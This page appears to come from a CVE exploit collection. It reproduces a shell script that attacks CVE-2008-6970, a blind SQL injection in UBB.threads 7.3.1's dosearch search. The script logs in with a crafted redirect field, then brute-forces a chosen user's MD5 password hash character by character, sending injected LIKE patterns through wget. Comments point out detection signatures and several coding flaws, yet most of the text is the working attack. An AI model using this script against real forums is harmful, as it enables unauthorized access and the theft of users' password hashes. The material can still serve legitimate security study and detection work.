CVE-2008-6970_UBB.threads_7.3.1_SQL注入漏洞

# CVE-2008-6970 UBB.threads 7.3.1 SQL注入漏洞
==INFO==


DESCRIPTION

Exploits a PHP parameter input-validation flaw and blindly brute-forces the MD5 hash stored in the SQL database for a given user ID.

FILE

CVE-2008-6970.sh - Shell script.

SOURCE

https://github.com/KyomaHooin/CVE-2008-6970

==CVE-2008-6970.sh==

#!/bin/sh
#
# UBB 7.3.1 dosearch.php blind SQL injection brute force attack
#

# Indicators for defenders: every request this script sends goes to
# ubbthreads.php?ubb=dosearch with a Forum[] value that contains SQL tokens
# ("'))", "SELECT", "LIKE", "/*"). A burst of such requests from a single
# session cookie is the signature to alert on; the durable fix is server-side
# validation of the Forum[] parameter, which is the flaw CVE-2008-6970 describes.
#
# Alphabet for one hex digit of the hash; A-F are tried before 0-9.
hex=(A B C D E F 0 1 2 3 4 5 6 7 8 9)
# Front controller of the target installation (host redacted by the author).
main='http://[removed]/ubbthreads/ubbthreads.php'
# POST body of the login form (credentials redacted). Its "from=" field is a
# double-URL-encoded dosearch query that itself carries a Forum[] injection
# ("and 1=1/*"); the INIT comment below says this is what bypasses the
# dosearch.inc.php access restriction.
login='ubb=start_page&Loginname=[removed]&Loginpass=[removed]&firstlogin=1&from=http%3A%2F%2F[removed]%2Fubbthreads%2Fubbthreads.php%3Fubb%3Ddosearch%26amp%3Bfromsearch%3D1%26amp%3BWords%3Dmove%26amp%3BForum%5B%5D%3Df2%2527%29%29%2Band%2B1%253D1%2F*&buttlogin=Log+In'
# Search request the blind oracle is built on.
base="$main?ubb=dosearch&fromsearch=1&Words=body"
# Forum[] parameter carrying the injected subquery (%3D is a URL-encoded '=',
# so USER_ID%3D3 hard-codes the victim row). The "LIKE '...%'" pattern is the
# only part replace()/push() rewrite; 'R' is not a hex digit, so it presumably
# serves as a "not yet determined" placeholder — confirm.
inject="&Forum[]=f2')) AND (SELECT 1 FROM w3t_USERS WHERE USER_ID%3D3 AND UPPER(USER_PASSWORD) LIKE 'R%')%3D1/*"

# Hex characters recovered so far; brute() appends one per successful probe.
hash=()

#######################################
# Rewrite the LIKE pattern inside an injection string: keep the leading run
# of '_' wildcards and swap whatever follows them (up to the closing %') for
# the given text.
# Arguments: $1 - string containing "LIKE '...%'"
#            $2 - text that replaces the non-underscore part of the pattern
# Outputs:   rewritten string on stdout
#######################################
replace(){
	# $1 is expanded unquoted, so it is word-split and glob-expanded before sed
	# sees it (ShellCheck SC2086); the trailing "/*" of the payload is a glob
	# that only stays literal as long as no path in the cwd matches it.
	echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1$2%'/"
}

#######################################
# Advance the LIKE pattern by one position: keep the leading '_' wildcards,
# add one more '_' (SQL LIKE's single-character wildcard), and replace
# whatever followed the underscores with the given text. The character
# resolved for the previous position is thus discarded; only its count of
# wildcard positions is carried forward.
# Arguments: $1 - string containing "LIKE '...%'"
#            $2 - text placed after the extended wildcard run
# Outputs:   rewritten string on stdout
#######################################
push(){
	# Same unquoted $1 expansion as in replace() (SC2086).
	echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1_$2%'/"
}

#######################################
# Probe one hash position: for each hex candidate, rewrite the LIKE pattern,
# issue the search request with the saved session cookies, and treat the
# absence of "There are no results" in the reply as a hit. On a hit the
# candidate is appended to the global hash array and the function returns.
# Globals:   hex, inject, base (read); hash (appended)
# Outputs:   response body to file "ubb"; updated cookies to cookies.txt
# Returns:   0 always; if no candidate matches, the loop simply ends and hash
#            receives nothing for this position
#
# Detection note: one call issues up to 16 requests and the INIT loop calls
# it 32 times, so a full run is up to 512 near-identical ubb=dosearch
# requests from one session — a per-session rate or anomaly rule on that
# endpoint catches it.
#######################################
brute(){
	for char in ${hex[*]}; do
		#replace string
		inj=`replace "$inject" $char`
		#inject
		wget -O ubb --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt "$base$inj"
		#if match then return characters to hash array
		# The command substitution is unquoted: an empty result gives "[ -z ]",
		# which is true, and a multi-word grep match makes "[" fail with "too
		# many arguments", which the if treats as no-match — it works, but by
		# accident rather than by design.
		if [ -z `cat ubb | grep "There are no results"` ]; then
			hash+=($char)
			return
		fi
		# The reply is only deleted on a miss; the matching reply stays on disk
		# as "ubb" (a host-side artifact).
		rm ubb
	done
}

# INIT

#get PHPSESSID cookie
# Step 1: unauthenticated GET to the front controller, kept only for the
# session cookie it sets (written to cookies.txt). $main is expanded unquoted.
wget -O /dev/null --keep-session-cookies --save-cookies cookies.txt $main
#login & get UBB cookies & inject SQL to bypass dosearch.inc.php access restriction
# Step 2: POST the login form with the session cookie. --post-data=$login is
# unquoted; as written the value holds no whitespace, so it survives intact.
wget -O /dev/null --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt --post-data=$login $main
#blind SQL injection brute force attack
# Step 3: 32 positions (the length of a hex-encoded MD5 digest, which the page
# description says is what is stored), each resolved by one brute() call;
# push() then turns the resolved position into a '_' wildcard so the next
# call targets the following character. A position with no match leaves a
# gap in the recovered value rather than stopping the loop.
for ((i=0; i<32;i++)); do
	brute
	inject=`push "$inject" "R"`
done
#clean
# Only the cookie jar is removed; the last "ubb" reply file and hash.txt stay
# in the working directory (host-side artifacts worth looking for).
rm cookies.txt
#print the hash
# Recovered characters are appended to hash.txt concatenated, with no
# separator and no trailing newline.
printf "%s" "${hash[@]}" >> hash.txt

